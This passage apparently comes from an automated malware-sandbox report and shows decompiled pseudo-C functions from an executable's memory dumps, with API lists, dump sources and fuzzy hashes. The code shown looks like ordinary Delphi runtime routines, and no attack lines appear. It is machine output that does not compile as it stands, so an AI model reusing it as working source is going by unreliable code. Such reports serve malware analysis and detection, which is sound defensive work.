                                  							 *[fs:eax] = _t155;
                                  							goto L19;
                                  						}
                                  					} else {
                                  						_pop(_t156);
                                  						 *[fs:eax] = _t156;
                                  						L19:
                                  						_pop(_t139);
                                  						 *[fs:eax] = _t139;
                                  						_push(0x4322d4);
                                  						return E004043FC( &_v52, 3);
                                  					}
                                  				}
                                  			}

                                  0x0043215b
                                  0x0043215e
                                  0x0043215f
                                  0x00432160
                                  0x00432162
                                  0x00432163
                                  0x0043216a
                                  0x00432181
                                  0x00432187
                                  0x0043218a
                                  0x00432190
                                  0x00432191
                                  0x00432195
                                  0x004321d0
                                  0x004321d6
                                  0x004321e1
                                  0x0043224a
                                  0x00432203
                                  0x00432208
                                  0x00432212
                                  0x00432215
                                  0x0043221c
                                  0x0043221f
                                  0x0043222b
                                  0x0043223c
                                  0x00432247
                                  0x00432247
                                  0x00432252
                                  0x00432197
                                  0x004321b3
                                  0x004321c4
                                  0x004321c7
                                  0x004321c7
                                  0x00432256
                                  0x00432256
                                  0x00432191
                                  0x0043225f
                                  0x00432262
                                  0x00432265
                                  0x00432275
                                  0x0043216c
                                  0x0043216c
                                  0x00432173
                                  0x00432176
                                  0x00000000
                                  0x00432176
                                  0x00432129
                                  0x0043212b
                                  0x0043212e
                                  0x004322b2
                                  0x004322b4
                                  0x004322b7
                                  0x004322ba
                                  0x004322cc
                                  0x004322cc
                                  0x00432127

                                  APIs
                                  • 738D6BB0.WINSPOOL.DRV(00000002,00000000,?,00000000,00000000,?,?,00000000,00432287,?,00000000,004322CD,?,00000000), ref: 0043211E
                                  • 738D6BB0.WINSPOOL.DRV(00000002,00000000,?,?,?,?,?,00000000,00432276,?,00000002,00000000,?,00000000,00000000,?), ref: 00432163
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: tdB
                                  • API String ID: 0-905615233
                                  • Opcode ID: 40199abf5bc58535117fd4b6ef43530856557fc0f6f1715ef57f196c84813990
                                  • Instruction ID: 87159ea1f92e3731019a7359f621114d806ea549d827d891ebf1df8232e1e6c2
                                  • Opcode Fuzzy Hash: 40199abf5bc58535117fd4b6ef43530856557fc0f6f1715ef57f196c84813990
                                  • Instruction Fuzzy Hash: F6713C71A04209AFDB15CF99DD81AAFBBF9FB4C310F20946AE500A7351D778AD01CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E0044506C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				intOrPtr* _v12;
                                  				struct tagPOINT _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				char _v36;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t54;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				intOrPtr _t71;
                                  				intOrPtr _t74;
                                  				intOrPtr _t88;
                                  				intOrPtr _t105;
                                  				intOrPtr _t115;
                                  				intOrPtr _t116;
                                  				intOrPtr _t120;
                                  				intOrPtr _t123;
                                  				intOrPtr _t124;
                                  				intOrPtr _t129;
                                  				void* _t133;
                                  				intOrPtr _t134;
                                  				void* _t137;
                                  
                                  				_t137 = __fp0;
                                  				_v8 = __ecx;
                                  				_t88 = __edx;
                                  				_t124 = __eax;
                                  				 *0x4bcaf8 = __eax;
                                  				_push(_t133);
                                  				_push(0x445211);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t134;
                                  				_v12 = 0;
                                  				 *0x4bcb00 = 0;
                                  				_t135 =  *((char*)(__eax + 0x9b));
                                  				if( *((char*)(__eax + 0x9b)) != 0) {
                                  					E00403814(__eax, __eflags);
                                  					__eflags =  *0x4bcaf8;
                                  					if( *0x4bcaf8 != 0) {
                                  						__eflags = _v12;
                                  						if(_v12 == 0) {
                                  							_v12 = E0044441C(1, _t124);
                                  							 *0x4bcb00 = 1;
                                  						}
                                  						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                  						_t105 =  *0x442c24; // 0x442c70
                                  						_t54 = E004037A4( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                  						__eflags = _t54;
                                  						if(_t54 == 0) {
                                  							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                  							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                  							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                  								L14:
                                  								__eflags = 0;
                                  								E0041B1A8(0,  &_v36, 0, _t124, _t129);
                                  								E0044685C(_t129,  &_v28,  &_v36);
                                  								_t60 = _v12;
                                  								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                  								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                  								L15:
                                  								_t130 = _v12;
                                  								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                  								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                  								E0041B1A8( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                  								_t65 = _v12;
                                  								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                  								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                  								goto L16;
                                  							}
                                  							_t116 =  *0x442c24; // 0x442c70
                                  							_t71 = E004037A4(_t129, _t116);
                                  							__eflags = _t71;
                                  							if(_t71 != 0) {
                                  								goto L14;
                                  							}
                                  							GetCursorPos( &_v20);
                                  							_t74 = _v12;
                                  							 *(_t74 + 0x44) = _v20.x;
                                  							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                  							goto L15;
                                  						} else {
                                  							GetWindowRect(E0044D590(_t128), _v12 + 0x44);
                                  							L16:
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							L17:
                                  							E00444EFC(_v12, _v8, _t88, _t133, _t137);
                                  							_pop(_t115);
                                  							 *[fs:eax] = _t115;
                                  							return 0;
                                  						}
                                  					}
                                  					_pop(_t120);
                                  					 *[fs:eax] = _t120;
                                  					return 0;
                                  				}
                                  				E00403814(__eax, _t135);
                                  				if( *0x4bcaf8 != 0) {
                                  					__eflags = _v12;
                                  					if(_v12 == 0) {
                                  						_v12 = E00444304(_t124, 1);
                                  						 *0x4bcb00 = 1;
                                  					}
                                  					goto L17;
                                  				}
                                  				_pop(_t123);
                                  				 *[fs:eax] = _t123;
                                  				return 0;
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: p,D
                                  • API String ID: 0-3811598181
                                  • Opcode ID: e8714ca27a055753bf656f5485cb3131f5775208386e7c9b7d9568a94b52486e
                                  • Instruction ID: 3d3d3a5cccf3ed2b0c926f0775515cf98fc9568c1efc7196716e0f096db8aa3a
                                  • Opcode Fuzzy Hash: e8714ca27a055753bf656f5485cb3131f5775208386e7c9b7d9568a94b52486e
                                  • Instruction Fuzzy Hash: 40519175E046059FDF00DF5AD881A9EBBF5FF89314F1080AAE800A7352D779AD81CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0040CF20(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				struct _MEMORY_BASIC_INFORMATION _v40;
                                  				char _v301;
                                  				char _v308;
                                  				intOrPtr _v312;
                                  				char _v316;
                                  				char _v320;
                                  				char _v324;
                                  				intOrPtr _v328;
                                  				char _v332;
                                  				void* _v336;
                                  				char _v340;
                                  				char _v344;
                                  				char _v348;
                                  				char _v352;
                                  				intOrPtr _v356;
                                  				char _v360;
                                  				char _v364;
                                  				char _v368;
                                  				void* _v372;
                                  				char _v376;
                                  				intOrPtr _t55;
                                  				intOrPtr _t65;
                                  				intOrPtr _t88;
                                  				intOrPtr _t92;
                                  				intOrPtr _t95;
                                  				intOrPtr _t107;
                                  				void* _t114;
                                  				void* _t115;
                                  				void* _t118;
                                  
                                  				_t115 = __esi;
                                  				_t114 = __edi;
                                  				_t98 = __ecx;
                                  				_v376 = 0;
                                  				_v340 = 0;
                                  				_v348 = 0;
                                  				_v344 = 0;
                                  				_v8 = 0;
                                  				_push(_t118);
                                  				_push(0x40d0e3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t118 + 0xfffffe8c;
                                  				_t95 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
                                  					_t55 =  *0x4bb050; // 0x407914
                                  					E0040656C(_t55, __ecx,  &_v8);
                                  				} else {
                                  					_t92 =  *0x4bb258; // 0x40790c
                                  					E0040656C(_t92, __ecx,  &_v8);
                                  				}
                                  				_v12 =  *((intOrPtr*)(_t95 + 0x18));
                                  				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
                                  				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
                                  					_v372 =  *(_t95 + 0xc);
                                  					_v368 = 5;
                                  					_v364 = _v8;
                                  					_v360 = 0xb;
                                  					_v356 = _v12;
                                  					_v352 = 5;
                                  					_t65 =  *0x4bb05c; // 0x4078b4
                                  					E0040656C(_t65, _t98,  &_v376);
                                  					E0040CB00(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
                                  				} else {
                                  					_v336 =  *(_t95 + 0xc);
                                  					_v332 = 5;
                                  					E00404648( &_v344, 0x105,  &_v301);
                                  					E00409330(_v344, 0x105,  &_v340);
                                  					_v328 = _v340;
                                  					_v324 = 0xb;
                                  					_v320 = _v8;
                                  					_v316 = 0xb;
                                  					_v312 = _v12;
                                  					_v308 = 5;
                                  					_t88 =  *0x4bb0fc; // 0x4079e4
                                  					E0040656C(_t88, 0x105,  &_v348);
                                  					E0040CB00(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
                                  				}
                                  				_pop(_t107);
                                  				 *[fs:eax] = _t107;
                                  				_push(E0040D0EA);
                                  				E004043D8( &_v376);
                                  				E004043FC( &_v348, 3);
                                  				return E004043D8( &_v8);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D0E3), ref: 0040CF8D
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D0E3), ref: 0040CFAF
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: y@
                                  • API String ID: 902310565-1812993971
                                  • Opcode ID: dc50034f6d17f8d9bd13dfb361d87b56784a81e70c345afcf94d68d8f5ef2637
                                  • Instruction ID: 1e4789998ece7e2516a096349d41a251f239e3dc166c5e00eab1ca4b9d7a36a2
                                  • Opcode Fuzzy Hash: dc50034f6d17f8d9bd13dfb361d87b56784a81e70c345afcf94d68d8f5ef2637
                                  • Instruction Fuzzy Hash: 2751F270A00658DFDB60DF68CD85BCAB7F4AB48304F4041EAE808AB381D779AE84CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00431AF4(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t40;
                                  				intOrPtr _t55;
                                  				struct HDC__* _t61;
                                  				char _t65;
                                  				intOrPtr _t71;
                                  				void* _t73;
                                  				intOrPtr* _t82;
                                  				intOrPtr _t84;
                                  				void* _t87;
                                  				void* _t90;
                                  
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v12 = 0;
                                  				_t65 = __edx;
                                  				_t84 = __eax;
                                  				_push(_t87);
                                  				_push(0x431c12);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t87 + 0xfffffff8;
                                  				_t27 =  *((intOrPtr*)(__eax + 0x1f));
                                  				if(__edx == _t27) {
                                  					L21:
                                  					_pop(_t71);
                                  					 *[fs:eax] = _t71;
                                  					_push(0x431c19);
                                  					return E004043D8( &_v12);
                                  				}
                                  				_t82 = 0;
                                  				_t73 = __edx - 1;
                                  				_t90 = _t73;
                                  				if(_t90 < 0) {
                                  					E00431C20(__eax, 0);
                                  					_t33 =  *((intOrPtr*)(_t84 + 4));
                                  					if( *((intOrPtr*)(_t84 + 4)) != 0) {
                                  						E0042955C(_t33, 0);
                                  					}
                                  					DeleteDC( *(_t84 + 0x20));
                                  					 *(_t84 + 0x20) = 0;
                                  					L15:
                                  					if(_t82 != 0) {
                                  						_t40 = E00432090(_t84, _t65, _t82, _t84);
                                  						_t69 =  *_t40;
                                  						_v8 =  *((intOrPtr*)( *_t40 + 0x18))(E00432078(_t84));
                                  						 *(_t84 + 0x20) =  *_t82(E00404898( *((intOrPtr*)(_v8 + 4))), E00404898( *((intOrPtr*)(_v8 + 8))), E00404898( *((intOrPtr*)(_v8 + 0xc))),  *((intOrPtr*)(_t84 + 0x24)));
                                  						if( *(_t84 + 0x20) == 0) {
                                  							_t55 =  *0x4bb100; // 0x42646c
                                  							E0040656C(_t55, _t69,  &_v12);
                                  							E004316E4(_v12);
                                  						}
                                  						_t53 =  *((intOrPtr*)(_t84 + 4));
                                  						if( *((intOrPtr*)(_t84 + 4)) != 0) {
                                  							E0042955C(_t53,  *(_t84 + 0x20));
                                  						}
                                  					}
                                  					 *((char*)(_t84 + 0x1f)) = _t65;
                                  					goto L21;
                                  				}
                                  				if(_t90 == 0) {
                                  					if(_t27 == 2) {
                                  						goto L21;
                                  					}
                                  					_t82 = 0x406d4c;
                                  				} else {
                                  					if(_t73 == 1) {
                                  						_t60 =  *((intOrPtr*)(__eax + 4));
                                  						if( *((intOrPtr*)(__eax + 4)) != 0) {
                                  							E0042955C(_t60, 0);
                                  						}
                                  						_t61 =  *(_t84 + 0x20);
                                  						if(_t61 != 0) {
                                  							DeleteDC(_t61);
                                  						}
                                  						_t82 = 0x406d24;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Delete
                                  • String ID: ldB
                                  • API String ID: 1035893169-667903305
                                  • Opcode ID: f23182a18b5c2541d3cfbfc284797e078516e28f25e930ae70a6c1e51262ffed
                                  • Instruction ID: 35e1beb8084b6117e91d645da988f93f07ceaa2da30d854eccb665eb5b2cd736
                                  • Opcode Fuzzy Hash: f23182a18b5c2541d3cfbfc284797e078516e28f25e930ae70a6c1e51262ffed
                                  • Instruction Fuzzy Hash: 6E315A307106049FC720EB7AD88191BB7E9AF4C710B15957BB449D7361EB38ED018A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E0045ADA8(intOrPtr __eax, void* __ecx, void* __edx) {
                                  				char _v8;
                                  				signed short _v10;
                                  				intOrPtr _v16;
                                  				char _v17;
                                  				char _v24;
                                  				intOrPtr _t34;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t48;
                                  				void* _t51;
                                  				void* _t53;
                                  				void* _t56;
                                  				void* _t59;
                                  				intOrPtr _t65;
                                  				intOrPtr _t68;
                                  				void* _t70;
                                  				void* _t72;
                                  				intOrPtr _t73;
                                  
                                  				_t53 = __ecx;
                                  				_t70 = _t72;
                                  				_t73 = _t72 + 0xffffffec;
                                  				_t51 = __edx;
                                  				_v16 = __eax;
                                  				_v10 =  *((intOrPtr*)(__edx + 4));
                                  				if(_v10 == 0) {
                                  					return 0;
                                  				} else {
                                  					if(GetKeyState(0x10) < 0) {
                                  						_v10 = _v10 + 0x2000;
                                  					}
                                  					if(GetKeyState(0x11) < 0) {
                                  						_v10 = _v10 + 0x4000;
                                  					}
                                  					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                  						_v10 = _v10 + 0x8000;
                                  					}
                                  					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                  					_t34 =  *0x4bcb70; // 0x1c40dc4
                                  					E0042FB04(_t34, _t53,  &_v24);
                                  					_push(_t70);
                                  					_push(0x45aea6);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t73;
                                  					while(1) {
                                  						_v17 = 0;
                                  						_v8 = E0045AAAC(_v16, 2, _v10 & 0x0000ffff);
                                  						if(_v8 != 0) {
                                  							break;
                                  						}
                                  						if(_v24 == 0 || _v17 != 2) {
                                  							_pop(_t65);
                                  							_pop(_t56);
                                  							 *[fs:eax] = _t65;
                                  							_push(0x45aead);
                                  							_t40 =  *0x4bcb70; // 0x1c40dc4
                                  							return E0042FAF0(_t40, _t56);
                                  						} else {
                                  							continue;
                                  						}
                                  						goto L14;
                                  					}
                                  					_t42 =  *0x4bcb70; // 0x1c40dc4
                                  					E0042FB04(_t42, 2,  &_v8);
                                  					_push(_t70);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t73;
                                  					_v17 = E0045AC54( &_v8, 0, _t70);
                                  					_pop(_t68);
                                  					_t59 = 0x45ae7b;
                                  					 *[fs:eax] = _t68;
                                  					_push(0x45ae82);
                                  					_t48 =  *0x4bcb70; // 0x1c40dc4
                                  					return E0042FAF0(_t48, _t59);
                                  				}
                                  				L14:
                                  			}


                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 0045ADCC
                                  • GetKeyState.USER32(00000011), ref: 0045ADDE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: f0dad1d55eceefc5299393bb36a9f3caed0e5048163ae2ca1a4ba1bcacdc4e33
                                  • Instruction ID: 3313a7cf3521f3f05c2e0b82fa23d9ff4d793afa3af55dbb8c220bc4b0b642ac
                                  • Opcode Fuzzy Hash: f0dad1d55eceefc5299393bb36a9f3caed0e5048163ae2ca1a4ba1bcacdc4e33
                                  • Instruction Fuzzy Hash: 77313E30A48204EFDB11DFA5E85279EB7F5EB45304F5485BBEC00A7292E77C5E18C62A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0040AFB0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				short _v18;
                                  				short _v22;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v280;
                                  				char* _t32;
                                  				intOrPtr* _t49;
                                  				intOrPtr _t58;
                                  				void* _t63;
                                  				void* _t67;
                                  
                                  				_v8 = 0;
                                  				_t49 = __edx;
                                  				_t63 = __eax;
                                  				_push(_t67);
                                  				_push(0x40b08e);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t67 + 0xfffffeec;
                                  				E004043D8(__edx);
                                  				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                  				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                  				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                  				if(_t63 > 2) {
                                  					E00404470( &_v8, 0x40b0b0);
                                  				} else {
                                  					E00404470( &_v8, 0x40b0a4);
                                  				}
                                  				_t32 = E00404898(_v8);
                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                  					E00404648(_t49, 0x100,  &_v280);
                                  					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                  						E004048F8( *_t49, E00404698( *_t49) - 1, 2, _t49);
                                  					}
                                  				}
                                  				_pop(_t58);
                                  				 *[fs:eax] = _t58;
                                  				_push(E0040B095);
                                  				return E004043D8( &_v8);
                                  			}


                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B08E), ref: 0040B036
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 0040B03C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 9765545c9fd2369f6b65f8f28f3195143eea0d5168a48c19beb4648664a038ec
                                  • Instruction ID: 72c1e3b354d4bdb33c578361660b6ce124898dfae790b750eb2de80324a6d621
                                  • Opcode Fuzzy Hash: 9765545c9fd2369f6b65f8f28f3195143eea0d5168a48c19beb4648664a038ec
                                  • Instruction Fuzzy Hash: DA2162786002189BDB15FBA5C842AAFB3A8EF49300F51447AB914F7391E7789E04876E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E0042D390(intOrPtr __eax, void* __edx, void* __edi) {
                                  				intOrPtr _v8;
                                  				char _v92;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t46;
                                  				intOrPtr _t55;
                                  				intOrPtr _t60;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t64;
                                  				void* _t67;
                                  				void* _t69;
                                  				intOrPtr _t70;
                                  
                                  				_t62 = __edi;
                                  				_t67 = _t69;
                                  				_t70 = _t69 + 0xffffffa8;
                                  				_push(_t63);
                                  				_t46 = __edx;
                                  				_v8 = __eax;
                                  				if(__edx == 0) {
                                  					L2:
                                  					E0042DB58(_v8);
                                  					_push("�A&");
                                  					L00406AC4();
                                  					_push(_t67);
                                  					_push(0x42d450);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t70;
                                  					if(_t46 == 0) {
                                  						E00402FB0( &_v92, 0x54);
                                  						E0042DE28(_v8, _t46, 0, 0, _t62, _t63, 0, 0,  &_v92);
                                  					} else {
                                  						_t64 = _t46;
                                  						E0042C844( *((intOrPtr*)(_t64 + 0x28)));
                                  						E0042C848( *((intOrPtr*)(_v8 + 0x28)));
                                  						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t64 + 0x28));
                                  						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t64 + 0x21));
                                  						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t64 + 0x34));
                                  						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t64 + 0x38));
                                  					}
                                  					_pop(_t55);
                                  					 *[fs:eax] = _t55;
                                  					_push(0x42d457);
                                  					_push("�A&");
                                  					L00406C2C();
                                  					return 0;
                                  				} else {
                                  					_t60 =  *0x4274c0; // 0x42750c
                                  					if(E004037A4(__edx, _t60) == 0) {
                                  						return E0041CE6C(_v8, _t46);
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(A&), ref: 0042D3C3
                                  • RtlLeaveCriticalSection.KERNEL32(A&,0042D457,00000000,0042D450,?,A&), ref: 0042D44A
                                    • Part of subcall function 0042DE28: RtlEnterCriticalSection.KERNEL32(A&), ref: 0042DECB
                                    • Part of subcall function 0042DE28: RtlLeaveCriticalSection.KERNEL32(A&,0042DF16,A&), ref: 0042DF09
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave
                                  • String ID: A&
                                  • API String ID: 3168844106-3747508005
                                  • Opcode ID: 6a2c9183ce3c5384685ee39594225f1b2e16a33661dc46d9b70cb1f32ac516eb
                                  • Instruction ID: 908683b94f32be2ac22323472a605587185e94e47de9b6179565e8b4e1442dc2
                                  • Opcode Fuzzy Hash: 6a2c9183ce3c5384685ee39594225f1b2e16a33661dc46d9b70cb1f32ac516eb
                                  • Instruction Fuzzy Hash: 4C21B334B042549FC710EFA9D9C2A9EBBF4EF48314BA041BAA845A7751CA38ED01DA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E0042DE28(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				intOrPtr _t67;
                                  				void* _t77;
                                  				void* _t78;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  
                                  				_t77 = _t78;
                                  				_t79 = _t78 + 0xfffffff8;
                                  				_v8 = __eax;
                                  				_v12 = E004035DC(1);
                                  				_push(_t77);
                                  				_push(0x42deaf);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t79;
                                  				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                  				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                  				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                  				_t80 = _t79 + 0xc;
                                  				 *((char*)(_v12 + 0x70)) = _a8;
                                  				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                  					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                  				}
                                  				_t62 =  *0x41a8a4; // 0x41a8f0
                                  				 *((intOrPtr*)(_v12 + 0x6c)) = E004037C8(_a4, _t62);
                                  				_pop(_t64);
                                  				 *[fs:eax] = _t64;
                                  				_push("�A&");
                                  				L00406AC4();
                                  				_push(_t77);
                                  				_push(0x42df0f);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t80;
                                  				E0042C848( *((intOrPtr*)(_v8 + 0x28)));
                                  				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                  				E0042C844(_v12);
